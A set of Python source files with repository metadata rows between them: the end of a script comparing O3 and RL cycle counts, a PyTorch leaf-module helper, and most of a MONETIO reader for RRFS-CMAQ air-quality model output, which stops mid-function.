    print("better_count: {}".format(better_count))
    print("equal_count: {}".format(equal_count))
    print("worse_count: {}".format(total_count - better_count - equal_count))
    avg_o3_cycle = np.average(total_o3_cycle)
    avg_rl_cycle = np.average(total_rl_cycle)
    geomean_o3_cycle = geomean(total_o3_cycle)
    geomean_rl_cycle = geomean(total_rl_cycle)
    print("average o3 cycles: {}".format(avg_o3_cycle))
    print("average rl cycles: {}".format(avg_rl_cycle))
    print("ratio: {}".format(avg_o3_cycle/avg_rl_cycle))
    print("geomean o3 cycles: {}".format(geomean_o3_cycle))
    print("geomean rl cycles: {}".format(geomean_rl_cycle))
    print("ratio: {}".format(geomean_o3_cycle/geomean_rl_cycle))
    #print(pgms)


if __name__ == '__main__':
    rollout_fn = sys.argv[1]
    parse_rollout(rollout_fn=rollout_fn)
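# Quick sanity check of geomean() above (illustrative): geomean([1, 10, 100]) is 10 up to
# floating-point rounding, since (1 * 10 * 100) ** (1/3) == 10. Taking the full product first
# can overflow or underflow for long cycle lists; np.exp(np.mean(np.log(a))) is a numerically
# safer equivalent for positive values.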
| 34.395062
| 401
| 0.623116
| 388
| 2,786
| 4.255155
| 0.332474
| 0.042399
| 0.036342
| 0.012114
| 0.155058
| 0.081163
| 0.032707
| 0
| 0
| 0
| 0
| 0.125963
| 0.207825
| 2,786
| 80
| 402
| 34.825
| 0.622111
| 0.059584
| 0
| 0.061538
| 0
| 0
| 0.168453
| 0.016462
| 0
| 0
| 0
| 0
| 0
| 1
| 0.046154
| false
| 0.015385
| 0.046154
| 0
| 0.138462
| 0.169231
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5fc5f8dbe2e450d186ac311e88fde09d3e71e36d
| 767
|
py
|
Python
|
src/transformer_utils/util/module_utils.py
|
cfoster0/transformer-utils
|
4e4bc61adb331f90bb2a9a394db07e25eda87555
|
[
"MIT"
] | 10
|
2021-07-11T07:32:35.000Z
|
2022-02-16T16:46:19.000Z
|
src/transformer_utils/util/module_utils.py
|
cfoster0/transformer-utils
|
4e4bc61adb331f90bb2a9a394db07e25eda87555
|
[
"MIT"
] | null | null | null |
src/transformer_utils/util/module_utils.py
|
cfoster0/transformer-utils
|
4e4bc61adb331f90bb2a9a394db07e25eda87555
|
[
"MIT"
] | 2
|
2021-05-24T22:50:28.000Z
|
2021-09-14T16:14:10.000Z
|
from .python_utils import make_print_if_verbose


def get_child_module_by_names(module, names):
    obj = module
    for getter in map(lambda name: lambda obj: getattr(obj, name), names):
        obj = getter(obj)
    return obj


def get_leaf_modules(module, verbose=False):
    vprint = make_print_if_verbose(verbose)

    names = []
    leaves = []
    handled = set()

    for param_name in dict(module.named_parameters()).keys():
        mod_name = param_name.rpartition(".")[0]
        mod = get_child_module_by_names(module, mod_name.split("."))

        if mod_name in handled:
            continue

        vprint((param_name, mod_name, mod))

        names.append(mod_name)
        leaves.append(mod)
        handled.add(mod_name)

    return names, leaves
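# Usage sketch (assumes a torch.nn model; torch itself is not imported by this module):
#
#     import torch.nn as nn
#     model = nn.Sequential(nn.Linear(4, 8), nn.ReLU(), nn.Linear(8, 2))
#     names, leaves = get_leaf_modules(model)
#     # names  -> ['0', '2']  (only the submodules that own parameters)
#     # leaves -> the two nn.Linear layers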
| 23.96875
| 74
| 0.65189
| 103
| 767
| 4.592233
| 0.407767
| 0.088795
| 0.046512
| 0.07611
| 0.114165
| 0.114165
| 0
| 0
| 0
| 0
| 0
| 0.001724
| 0.243807
| 767
| 31
| 75
| 24.741935
| 0.813793
| 0
| 0
| 0
| 0
| 0
| 0.002608
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.095238
| false
| 0
| 0.047619
| 0
| 0.238095
| 0.142857
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5fc75bc9dcba17efcc6fbd5b1c74a679be2c870d
| 32,615
|
py
|
Python
|
monetio/models/_rrfs_cmaq_mm.py
|
zmoon/monetio
|
c8326750fa5d2404ccec726a5088f9a0e7fd4c4a
|
[
"MIT"
] | 1
|
2022-02-18T22:49:23.000Z
|
2022-02-18T22:49:23.000Z
|
monetio/models/_rrfs_cmaq_mm.py
|
zmoon/monetio
|
c8326750fa5d2404ccec726a5088f9a0e7fd4c4a
|
[
"MIT"
] | null | null | null |
monetio/models/_rrfs_cmaq_mm.py
|
zmoon/monetio
|
c8326750fa5d2404ccec726a5088f9a0e7fd4c4a
|
[
"MIT"
] | 1
|
2022-02-04T19:09:32.000Z
|
2022-02-04T19:09:32.000Z
|
""" RRFS-CMAQ File Reader """
import numpy as np
import xarray as xr
from numpy import concatenate
from pandas import Series
def can_do(index):
if index.max():
return True
else:
return False
def open_mfdataset(
fname,
convert_to_ppb=True,
mech="cb6r3_ae6_aq",
var_list=None,
fname_pm25=None,
surf_only=False,
**kwargs
):
# Like WRF-chem add var list that just determines whether to calculate sums or not to speed this up.
"""Method to open RFFS-CMAQ dyn* netcdf files.
Parameters
----------
fname : string or list
fname is the path to the file or files. It will accept hot keys in
strings as well.
convert_to_ppb : boolean
If true the units of the gas species will be converted to ppbv
mech: str
Mechanism to be used for calculating sums. Mechanisms supported:
"cb6r3_ae6_aq"
var_list: list
List of variables to include in output. MELODIES-MONET only reads in
variables needed to plot in order to save on memory and simulation cost
especially for vertical data. If None, will read in all model data and
calculate all sums.
fname_pm25: string or list
Optional path to the file or files for precalculated PM2.5 sums. It
will accept hot keys in strings as well.
surf_only: boolean
Whether to save only surface data to save on memory and computational
cost (True) or not (False).
Returns
-------
xarray.DataSet
RRFS-CMAQ model dataset in standard format for use in MELODIES-MONET
"""
# Get dictionary of summed species for the mechanism of choice.
dict_sum = dict_species_sums(mech=mech)
if var_list is not None:
# Read in only a subset of variables and only do calculations if needed.
var_list_orig = var_list.copy() # Keep track of the original list before changes.
list_calc_sum = []
list_remove_extra = [] # list of variables to remove after the sum to save in memory.
for var_sum in [
"PM25",
"PM10",
"noy_gas",
"noy_aer",
"nox",
"pm25_cl",
"pm25_ec",
"pm25_ca",
"pm25_na",
"pm25_nh4",
"pm25_no3",
"pm25_so4",
"pm25_om",
]:
if var_sum in var_list:
if var_sum == "PM25":
var_list.extend(dict_sum["aitken"])
var_list.extend(dict_sum["accumulation"])
var_list.extend(dict_sum["coarse"])
# Keep track to remove these later too
list_remove_extra.extend(dict_sum["aitken"])
list_remove_extra.extend(dict_sum["accumulation"])
list_remove_extra.extend(dict_sum["coarse"])
elif var_sum == "PM10":
var_list.extend(dict_sum["aitken"])
var_list.extend(dict_sum["accumulation"])
var_list.extend(dict_sum["coarse"])
# Keep track to remove these later too
list_remove_extra.extend(dict_sum["aitken"])
list_remove_extra.extend(dict_sum["accumulation"])
list_remove_extra.extend(dict_sum["coarse"])
else:
var_list.extend(dict_sum[var_sum])
# Keep track to remove these later too
list_remove_extra.extend(dict_sum[var_sum])
var_list.remove(var_sum)
list_calc_sum.append(var_sum)
# append the other needed species.
var_list.append("lat")
var_list.append("lon")
var_list.append("phalf")
var_list.append("tmp")
var_list.append("pressfc")
var_list.append("dpres")
var_list.append("hgtsfc")
var_list.append("delz")
# Remove duplicates just in case:
var_list = list(dict.fromkeys(var_list))
list_remove_extra = list(dict.fromkeys(list_remove_extra))
# Select only those elements in list_remove_extra that are not in var_list_orig
list_remove_extra_only = list(set(list_remove_extra) - set(var_list_orig))
# If variables in pm25 files are included remove these as these are not in the main file
# And will be added later.
for pm25_var in [
"PM25_TOT",
"PM25_TOT_NSOM",
"PM25_EC",
"PM25_NH4",
"PM25_NO3",
"PM25_SO4",
"PM25_OC",
"PM25_OM",
]:
if pm25_var in var_list:
var_list.remove(pm25_var)
# open the dataset using xarray
dset = xr.open_mfdataset(fname, concat_dim="time", combine="nested", **kwargs)[var_list]
else:
# Read in all variables and do all calculations.
dset = xr.open_mfdataset(fname, concat_dim="time", combine="nested", **kwargs)
list_calc_sum = [
"PM25",
"PM10",
"noy_gas",
"noy_aer",
"nox",
"pm25_cl",
"pm25_ec",
"pm25_ca",
"pm25_na",
"pm25_nh4",
"pm25_no3",
"pm25_so4",
"pm25_om",
]
if fname_pm25 is not None:
# Add the processed pm2.5 species.
dset_pm25 = xr.open_mfdataset(fname_pm25, concat_dim="time", combine="nested", **kwargs)
dset_pm25 = dset_pm25.drop(
labels=["lat", "lon", "pfull"]
) # Drop duplicate variables so can merge.
# Slight differences in pfull value between the files, but I assume that these still represent the
# same pressure levels from the model dynf* files.
# Attributes are formatted differently in pm25 file so remove attributes and use those from dynf* files.
dset_pm25.attrs = {}
dset = dset.merge(dset_pm25)
# Standardize some variable names
dset = dset.rename(
{
"grid_yt": "y",
"grid_xt": "x",
"pfull": "z",
"phalf": "z_i", # Interface pressure levels
"lon": "longitude",
"lat": "latitude",
"tmp": "temperature_k", # standard temperature (kelvin)
"pressfc": "surfpres_pa",
"dpres": "dp_pa", # Change names so standard surfpres_pa and dp_pa
"hgtsfc": "surfalt_m",
"delz": "dz_m",
}
) # Optional, but when available include altitude info
# Calculate pressure. This has to go before sorting because ak and bk
# are not sorted as they are in attributes
dset["pres_pa_mid"] = _calc_pressure(dset)
# Adjust pressure levels for all models such that the surface is first.
dset = dset.sortby("z", ascending=False)
dset = dset.sortby("z_i", ascending=False)
# Note: this altitude calc needs to always go after resorting.
# Altitude calculations are all optional, but for each model add values that are easy to calculate.
dset["alt_msl_m_full"] = _calc_hgt(dset)
dset["dz_m"] = dset["dz_m"] * -1.0 # Change to positive values.
# Set coordinates
dset = dset.reset_index(
["x", "y", "z", "z_i"], drop=True
) # For now drop z_i no variables use it.
dset["latitude"] = dset["latitude"].isel(time=0)
dset["longitude"] = dset["longitude"].isel(time=0)
dset = dset.reset_coords()
dset = dset.set_coords(["latitude", "longitude"])
# These sums and units are quite expensive and memory intensive,
# so add option to shrink dataset to just surface when needed
if surf_only:
dset = dset.isel(z=0).expand_dims("z", axis=1)
# Need to adjust units before summing for aerosols
# convert all gas species to ppbv
if convert_to_ppb:
for i in dset.variables:
if "units" in dset[i].attrs:
if "ppmv" in dset[i].attrs["units"]:
dset[i] *= 1000.0
dset[i].attrs["units"] = "ppbv"
# convert "ug/kg to ug/m3"
for i in dset.variables:
if "units" in dset[i].attrs:
if "ug/kg" in dset[i].attrs["units"]:
# ug/kg -> ug/m3 using dry air density
dset[i] = dset[i] * dset["pres_pa_mid"] / dset["temperature_k"] / 287.05535
dset[i].attrs["units"] = r"$\mu g m^{-3}$"
# add lazy diagnostic variables
# Note that because there are so many species to sum, summing the aerosols slows down the code.
if "PM25" in list_calc_sum:
dset = add_lazy_pm25(dset, dict_sum)
if "PM10" in list_calc_sum:
dset = add_lazy_pm10(dset, dict_sum)
if "noy_gas" in list_calc_sum:
dset = add_lazy_noy_g(dset, dict_sum)
if "noy_aer" in list_calc_sum:
dset = add_lazy_noy_a(dset, dict_sum)
if "nox" in list_calc_sum:
dset = add_lazy_nox(dset, dict_sum)
if "pm25_cl" in list_calc_sum:
dset = add_lazy_cl_pm25(dset, dict_sum)
if "pm25_ec" in list_calc_sum:
dset = add_lazy_ec_pm25(dset, dict_sum)
if "pm25_ca" in list_calc_sum:
dset = add_lazy_ca_pm25(dset, dict_sum)
if "pm25_na" in list_calc_sum:
dset = add_lazy_na_pm25(dset, dict_sum)
if "pm25_nh4" in list_calc_sum:
dset = add_lazy_nh4_pm25(dset, dict_sum)
if "pm25_no3" in list_calc_sum:
dset = add_lazy_no3_pm25(dset, dict_sum)
if "pm25_so4" in list_calc_sum:
dset = add_lazy_so4_pm25(dset, dict_sum)
if "pm25_om" in list_calc_sum:
dset = add_lazy_om_pm25(dset, dict_sum)
# Change the times to pandas format
dset["time"] = dset.indexes["time"].to_datetimeindex(unsafe=True)
# Turn off warning for now. This is just because the model is in julian time
# Drop extra variables that were part of sum, but are not in original var_list
# to save memory and computational time.
# This is only relevant if var_list is provided
if var_list is not None:
if bool(list_remove_extra_only): # confirm list not empty
dset = dset.drop_vars(list_remove_extra_only)
return dset
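# Usage sketch (file pattern and variable names are illustrative, not prescribed by this module):
#
#     dset = open_mfdataset("dynf*.nc", var_list=["PM25", "o3"], surf_only=True)
#
# reads only the listed variables plus the coordinate and meteorological fields it always needs,
# registers the lazy PM25 sum, and keeps just the surface level to limit memory use.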
def _get_keys(d):
"""Calculates keys
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
list
list of keys
"""
keys = Series([i for i in d.data_vars.keys()])
return keys
def add_lazy_pm25(d, dict_sum):
"""Calculates PM2.5 sum. 20% of coarse mode is included in PM2.5 sum.
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
xarray.Dataset
RRFS-CMAQ model data including new PM2.5 calculation
"""
keys = _get_keys(d)
allvars = Series(
concatenate([dict_sum["aitken"], dict_sum["accumulation"], dict_sum["coarse"]])
)
weights = Series(
concatenate(
[
np.ones(len(dict_sum["aitken"])),
np.ones(len(dict_sum["accumulation"])),
np.full(len(dict_sum["coarse"]), 0.2),
]
)
)
index = allvars.isin(keys)
if can_do(index):
newkeys = allvars.loc[index]
newweights = weights.loc[index]
d["PM25"] = add_multiple_lazy2(d, newkeys, weights=newweights)
d["PM25"] = d["PM25"].assign_attrs(
{
"units": r"$\mu g m^{-3}$",
"name": "PM2.5",
"long_name": "PM2.5 calculated by MONET assuming coarse mode 20%",
}
)
return d
def add_lazy_pm10(d, dict_sum):
"""Calculates PM10 sum.
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
xarray.Dataset
RRFS-CMAQ model data including new PM10 calculation
"""
keys = _get_keys(d)
allvars = Series(
concatenate([dict_sum["aitken"], dict_sum["accumulation"], dict_sum["coarse"]])
)
index = allvars.isin(keys)
if can_do(index):
newkeys = allvars.loc[index]
d["PM10"] = add_multiple_lazy2(d, newkeys)
d["PM10"] = d["PM10"].assign_attrs(
{
"units": r"$\mu g m^{-3}$",
"name": "PM10",
"long_name": "Particulate Matter < 10 microns",
}
)
return d
def add_lazy_noy_g(d, dict_sum):
"""Calculates NOy gas
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
xarray.Dataset
RRFS-CMAQ model data including new NOy gas calculation
"""
keys = _get_keys(d)
allvars = Series(dict_sum["noy_gas"])
weights = Series(dict_sum["noy_gas_weight"])
index = allvars.isin(keys)
if can_do(index):
newkeys = allvars.loc[index]
newweights = weights.loc[index]
d["noy_gas"] = add_multiple_lazy2(d, newkeys, weights=newweights)
d["noy_gas"] = d["noy_gas"].assign_attrs({"name": "noy_gas", "long_name": "NOy gases"})
return d
def add_lazy_noy_a(d, dict_sum):
"""Calculates NOy aerosol
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
xarray.Dataset
RRFS-CMAQ model data including new NOy aerosol calculation
"""
keys = _get_keys(d)
allvars = Series(dict_sum["noy_aer"])
index = allvars.isin(keys)
if can_do(index):
newkeys = allvars.loc[index]
d["noy_aer"] = add_multiple_lazy2(d, newkeys)
d["noy_aer"] = d["noy_aer"].assign_attrs(
{"units": r"$\mu g m^{-3}$", "name": "noy_aer", "long_name": "NOy aerosol"}
)
return d
def add_lazy_nox(d, dict_sum):
"""Calculates NOx
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
xarray.Dataset
RRFS-CMAQ model data including new NOx calculation
"""
keys = _get_keys(d)
allvars = Series(dict_sum["nox"])
index = allvars.isin(keys)
if can_do(index):
newkeys = allvars.loc[index]
d["nox"] = add_multiple_lazy2(d, newkeys)
d["nox"] = d["nox"].assign_attrs({"name": "nox", "long_name": "nox"})
return d
def add_lazy_cl_pm25(d, dict_sum):
"""Calculates sum of particulate Cl.
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
xarray.Dataset
RRFS-CMAQ model data including new CLf calculation
"""
keys = _get_keys(d)
allvars = Series(dict_sum["pm25_cl"])
weights = Series(dict_sum["pm25_cl_weight"])
index = allvars.isin(keys)
if can_do(index):
newkeys = allvars.loc[index]
neww = weights.loc[index]
d["pm25_cl"] = add_multiple_lazy2(d, newkeys, weights=neww)
d["pm25_cl"] = d["pm25_cl"].assign_attrs(
{
"units": r"$\mu g m^{-3}$",
"name": "pm25_cl",
"long_name": "PM2.5 CL assuming coarse mode 20%",
}
)
return d
def add_lazy_ec_pm25(d, dict_sum):
"""Calculates sum of particulate EC.
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
xarray.Dataset
RRFS-CMAQ model data including new EC calculation
"""
keys = _get_keys(d)
allvars = Series(dict_sum["pm25_ec"])
weights = Series(dict_sum["pm25_ec_weight"])
index = allvars.isin(keys)
if can_do(index):
newkeys = allvars.loc[index]
neww = weights.loc[index]
d["pm25_ec"] = add_multiple_lazy2(d, newkeys, weights=neww)
d["pm25_ec"] = d["pm25_ec"].assign_attrs(
{
"units": r"$\mu g m^{-3}$",
"name": "pm25_ec",
"long_name": "PM2.5 EC assuming coarse mode 20%",
}
)
return d
def add_lazy_ca_pm25(d, dict_sum):
"""Calculates sum of particulate CA.
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
xarray.Dataset
RRFS-CMAQ model data including new CA calculation
"""
keys = _get_keys(d)
allvars = Series(dict_sum["pm25_ca"])
weights = Series(dict_sum["pm25_ca_weight"])
index = allvars.isin(keys)
if can_do(index):
newkeys = allvars.loc[index]
neww = weights.loc[index]
d["pm25_ca"] = add_multiple_lazy2(d, newkeys, weights=neww)
d["pm25_ca"] = d["pm25_ca"].assign_attrs(
{
"units": r"$\mu g m^{-3}$",
"name": "pm25_ca",
"long_name": "PM2.5 CA assuming coarse mode 20%",
}
)
return d
def add_lazy_na_pm25(d, dict_sum):
"""Calculates sum of particulate NA.
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
xarray.Dataset
RRFS-CMAQ model data including new NA calculation
"""
keys = _get_keys(d)
allvars = Series(dict_sum["pm25_na"])
weights = Series(dict_sum["pm25_na_weight"])
index = allvars.isin(keys)
if can_do(index):
newkeys = allvars.loc[index]
neww = weights.loc[index]
d["pm25_na"] = add_multiple_lazy2(d, newkeys, weights=neww)
d["pm25_na"] = d["pm25_na"].assign_attrs(
{
"units": r"$\mu g m^{-3}$",
"name": "pm25_na",
"long_name": "PM2.5 NA assuming coarse mode 20%",
}
)
return d
def add_lazy_nh4_pm25(d, dict_sum):
"""Calculates sum of particulate NH4.
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
xarray.Dataset
RRFS-CMAQ model data including new NH4 calculation
"""
keys = _get_keys(d)
allvars = Series(dict_sum["pm25_nh4"])
weights = Series(dict_sum["pm25_nh4_weight"])
index = allvars.isin(keys)
if can_do(index):
newkeys = allvars.loc[index]
neww = weights.loc[index]
d["pm25_nh4"] = add_multiple_lazy2(d, newkeys, weights=neww)
d["pm25_nh4"] = d["pm25_nh4"].assign_attrs(
{
"units": r"$\mu g m^{-3}$",
"name": "pm25_nh4",
"long_name": "PM2.5 NH4 assuming coarse mode 20%",
}
)
return d
def add_lazy_no3_pm25(d, dict_sum):
"""Calculates sum of particulate NO3.
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
xarray.Dataset
RRFS-CMAQ model data including new NO3 calculation
"""
keys = _get_keys(d)
allvars = Series(dict_sum["pm25_no3"])
weights = Series(dict_sum["pm25_no3_weight"])
index = allvars.isin(keys)
if can_do(index):
newkeys = allvars.loc[index]
neww = weights.loc[index]
d["pm25_no3"] = add_multiple_lazy2(d, newkeys, weights=neww)
d["pm25_no3"] = d["pm25_no3"].assign_attrs(
{
"units": r"$\mu g m^{-3}$",
"name": "pm25_no3",
"long_name": "PM2.5 NO3 assuming coarse mode 20%",
}
)
return d
def add_lazy_so4_pm25(d, dict_sum):
"""Calculates sum of particulate SO4.
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
xarray.Dataset
RRFS-CMAQ model data including new SO4 calculation
"""
keys = _get_keys(d)
allvars = Series(dict_sum["pm25_so4"])
weights = Series(dict_sum["pm25_so4_weight"])
index = allvars.isin(keys)
if can_do(index):
newkeys = allvars.loc[index]
neww = weights.loc[index]
d["pm25_so4"] = add_multiple_lazy2(d, newkeys, weights=neww)
d["pm25_so4"] = d["pm25_so4"].assign_attrs(
{
"units": r"$\mu g m^{-3}$",
"name": "pm25_so4",
"long_name": "PM2.5 SO4 assuming coarse mode 20%",
}
)
return d
def add_lazy_om_pm25(d, dict_sum):
"""Calculates sum of particulate OM.
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
xarray.Dataset
RRFS-CMAQ model data including new OM calculation
"""
keys = _get_keys(d)
allvars = Series(dict_sum["pm25_om"])
index = allvars.isin(keys)
if can_do(index):
newkeys = allvars.loc[index]
d["pm25_om"] = add_multiple_lazy2(d, newkeys)
d["pm25_om"] = d["pm25_om"].assign_attrs(
{"units": r"$\mu g m^{-3}$", "name": "pm25_om", "long_name": "PM2.5 OM"}
)
return d
def add_multiple_lazy(dset, variables, weights=None):
"""Sums variables
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
variables : series
series of variables
weights : series
series of weights to apply to each variable during the sum
Returns
-------
xarray.Dataarray
Weighted sum of all specified variables
"""
from numpy import ones
if weights is None:
weights = ones(len(variables))
else:
weights = weights.values
variables = variables.values
new = dset[variables[0]].copy() * weights[0]
for i, j in zip(variables[1:], weights[1:]):
new = new + dset[i] * j
return new
def add_multiple_lazy2(dset, variables, weights=None):
"""Sums variables. This is similar to add_multiple_lazy, but is a little
faster.
Parameters
----------
d : xarray.Dataset
RRFS-CMAQ model data
variables : series
series of variables
weights : series
series of weights to apply to each variable during the sum
Returns
-------
xarray.Dataarray
Weighted sum of all specified variables
"""
dset2 = dset[variables.values]
if weights is not None:
for i, j in zip(variables.values, weights.values):
dset2[i] = dset2[i] * j
new = dset2.to_array().sum("variable")
return new
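# Small illustration of the weighted sum performed above (made-up data):
#
#     import pandas as pd, xarray as xr
#     ds = xr.Dataset({"aso4j": ("x", [1.0, 2.0]), "aso4k": ("x", [3.0, 4.0])})
#     add_multiple_lazy2(ds, pd.Series(["aso4j", "aso4k"]), weights=pd.Series([1.0, 0.2]))
#     # -> DataArray [1.6, 2.8], i.e. aso4j + 0.2 * aso4k (the coarse-mode 20% weighting)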
def _predefined_mapping_tables(dset):
"""Predefined mapping tables for different observational parings used when
combining data.
Returns
-------
dictionary
dictionary defining default mapping tables
"""
to_improve = {}
to_nadp = {}
to_aqs = {
"OZONE": ["o3"],
"PM2.5": ["PM25"],
"CO": ["co"],
"NOY": ["NOy"],
"NOX": ["NOx"],
"SO2": ["so2"],
"NO": ["no"],
"NO2": ["no2"],
}
to_airnow = {
"OZONE": ["o3"],
"PM2.5": ["PM25"],
"CO": ["co"],
"NOY": ["NOy"],
"NOX": ["NOx"],
"SO2": ["so2"],
"NO": ["no"],
"NO2": ["no2"],
}
to_crn = {}
to_aeronet = {}
to_cems = {}
mapping_tables = {
"improve": to_improve,
"aqs": to_aqs,
"airnow": to_airnow,
"crn": to_crn,
"cems": to_cems,
"nadp": to_nadp,
"aeronet": to_aeronet,
}
dset = dset.assign_attrs({"mapping_tables": mapping_tables})
return dset
# For the different mechanisms, just update these arrays as needed.
def dict_species_sums(mech):
"""Predefined mapping tables for different observational parings used when
combining data.
Parameters
----------
mech : string
mechanism name
Returns
-------
dictionary
dictionary defining the variables to sum based on the specified mechanism
"""
if mech == "cb6r3_ae6_aq":
sum_dict = {}
# Arrays for different gases and PM groupings
sum_dict.update(
{
"accumulation": [
"aso4j",
"ano3j",
"anh4j",
"anaj",
"aclj",
"aecj",
"aothrj",
"afej",
"asij",
"atij",
"acaj",
"amgj",
"amnj",
"aalj",
"akj",
"alvpo1j",
"asvpo1j",
"asvpo2j",
"asvpo3j",
"aivpo1j",
"axyl1j",
"axyl2j",
"axyl3j",
"atol1j",
"atol2j",
"atol3j",
"abnz1j",
"abnz2j",
"abnz3j",
"aiso1j",
"aiso2j",
"aiso3j",
"atrp1j",
"atrp2j",
"asqtj",
"aalk1j",
"aalk2j",
"apah1j",
"apah2j",
"apah3j",
"aorgcj",
"aolgbj",
"aolgaj",
"alvoo1j",
"alvoo2j",
"asvoo1j",
"asvoo2j",
"asvoo3j",
"apcsoj",
]
}
)
sum_dict.update(
{
"accumulation_wopc": [
"aso4j",
"ano3j",
"anh4j",
"anaj",
"aclj",
"aecj",
"aothrj",
"afej",
"asij",
"atij",
"acaj",
"amgj",
"amnj",
"aalj",
"akj",
"alvpo1j",
"asvpo1j",
"asvpo2j",
"asvpo3j",
"aivpo1j",
"axyl1j",
"axyl2j",
"axyl3j",
"atol1j",
"atol2j",
"atol3j",
"abnz1j",
"abnz2j",
"abnz3j",
"aiso1j",
"aiso2j",
"aiso3j",
"atrp1j",
"atrp2j",
"asqtj",
"aalk1j",
"aalk2j",
"apah1j",
"apah2j",
"apah3j",
"aorgcj",
"aolgbj",
"aolgaj",
"alvoo1j",
"alvoo2j",
"asvoo1j",
"asvoo2j",
"asvoo3j",
]
}
)
sum_dict.update(
{
"aitken": [
"aso4i",
"ano3i",
"anh4i",
"anai",
"acli",
"aeci",
"aothri",
"alvpo1i",
"asvpo1i",
"asvpo2i",
"alvoo1i",
"alvoo2i",
"asvoo1i",
"asvoo2i",
]
}
)
sum_dict.update(
{"coarse": ["asoil", "acors", "aseacat", "aclk", "aso4k", "ano3k", "anh4k"]}
)
sum_dict.update(
{
"noy_gas": [
"no",
"no2",
"no3",
"n2o5",
"hono",
"hno3",
"pna",
"cron",
"clno2",
"pan",
"panx",
"opan",
"ntr1",
"ntr2",
"intr",
]
}
)
sum_dict.update({"noy_gas_weight": [1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]})
sum_dict.update(
{"noy_aer": ["ano3i", "ano3j", "ano3k"]}
) # Need to confirm here if there is a size cutoff for noy obs?
sum_dict.update({"nox": ["no", "no2"]})
sum_dict.update({"pm25_cl": ["acli", "aclj", "aclk"]})
sum_dict.update({"pm25_cl_weight": [1, 1, 0.2]})
sum_dict.update({"pm25_ec": ["aeci", "aecj"]})
sum_dict.update({"pm25_ec_weight": [1, 1]})
sum_dict.update({"pm25_na": ["anai", "anaj", "aseacat", "asoil", "acors"]})
sum_dict.update({"pm25_na_weight": [1, 1, 0.2 * 0.8373, 0.2 * 0.0626, 0.2 * 0.0023]})
sum_dict.update({"pm25_ca": ["acaj", "aseacat", "asoil", "acors"]})
sum_dict.update({"pm25_ca_weight": [1, 0.2 * 0.0320, 0.2 * 0.0838, 0.2 * 0.0562]})
sum_dict.update({"pm25_nh4": ["anh4i", "anh4j", "anh4k"]})
sum_dict.update({"pm25_nh4_weight": [1, 1, 0.2]})
sum_dict.update({"pm25_no3": ["ano3i", "ano3j", "ano3k"]})
sum_dict.update({"pm25_no3_weight": [1, 1, 0.2]})
sum_dict.update({"pm25_so4": ["aso4i", "aso4j", "aso4k"]})
sum_dict.update({"pm25_so4_weight": [1, 1, 0.2]})
sum_dict.update(
{
"pm25_om": [
"alvpo1i",
"asvpo1i",
"asvpo2i",
"alvoo1i",
"alvoo2i",
"asvoo1i",
"asvoo2i",
"alvpo1j",
"asvpo1j",
"asvpo2j",
"asvpo3j",
"aivpo1j",
"axyl1j",
"axyl2j",
"axyl3j",
"atol1j",
"atol2j",
"atol3j",
"abnz1j",
"abnz2j",
"abnz3j",
"aiso1j",
"aiso2j",
"aiso3j",
"atrp1j",
"atrp2j",
"asqtj",
"aalk1j",
"aalk2j",
"apah1j",
"apah2j",
"apah3j",
"aorgcj",
"aolgbj",
"aolgaj",
"alvoo1j",
"alvoo2j",
"asvoo1j",
"asvoo2j",
"asvoo3j",
"apcsoj",
]
}
)
else:
raise NotImplementedError(
"Mechanism not supported, update _rrfs_cmaq_mm.py file in MONETIO"
)
return sum_dict
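# --- Added illustration (not part of the original module) ---
# A hypothetical sketch of how the dictionary returned by dict_species_sums is
# consumed: each "<group>" list of species is paired with a "<group>_weight"
# list of the same length, and the add_lazy_* helpers sum them. The dataset
# below is invented (all species set to 1) just to show the plumbing.
def _example_species_sum():
    import numpy as np
    import xarray as xr

    dict_sum = dict_species_sums("cb6r3_ae6_aq")
    assert len(dict_sum["pm25_no3"]) == len(dict_sum["pm25_no3_weight"])
    demo = xr.Dataset({name: ("x", np.ones(2)) for name in dict_sum["pm25_no3"]})
    # Adds demo["pm25_no3"] = 1*ano3i + 1*ano3j + 0.2*ano3k = 2.2 everywhere
    return add_lazy_no3_pm25(demo, dict_sum)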
def _calc_hgt(f):
"""Calculates the geopotential height in m from the variables hgtsfc and
delz. Note: To use this function the delz value needs to go from surface
to top of atmosphere in vertical. Because we are adding the height of
each grid box these are really grid top values
Parameters
----------
f : xarray.Dataset
RRFS-CMAQ model data
Returns
-------
xr.DataArray
Geoptential height with attributes.
"""
sfc = f.surfalt_m.load()
dz = f.dz_m.load() * -1.0
# These are negative in RRFS-CMAQ, but the levels have been re-sorted and are summed
# from the surface upward, so make them positive.
dz[:, 0, :, :] = dz[:, 0, :, :] + sfc # Add the surface altitude to the first model level only
z = dz.rolling(z=len(f.z), min_periods=1).sum()
z.name = "alt_msl_m_full"
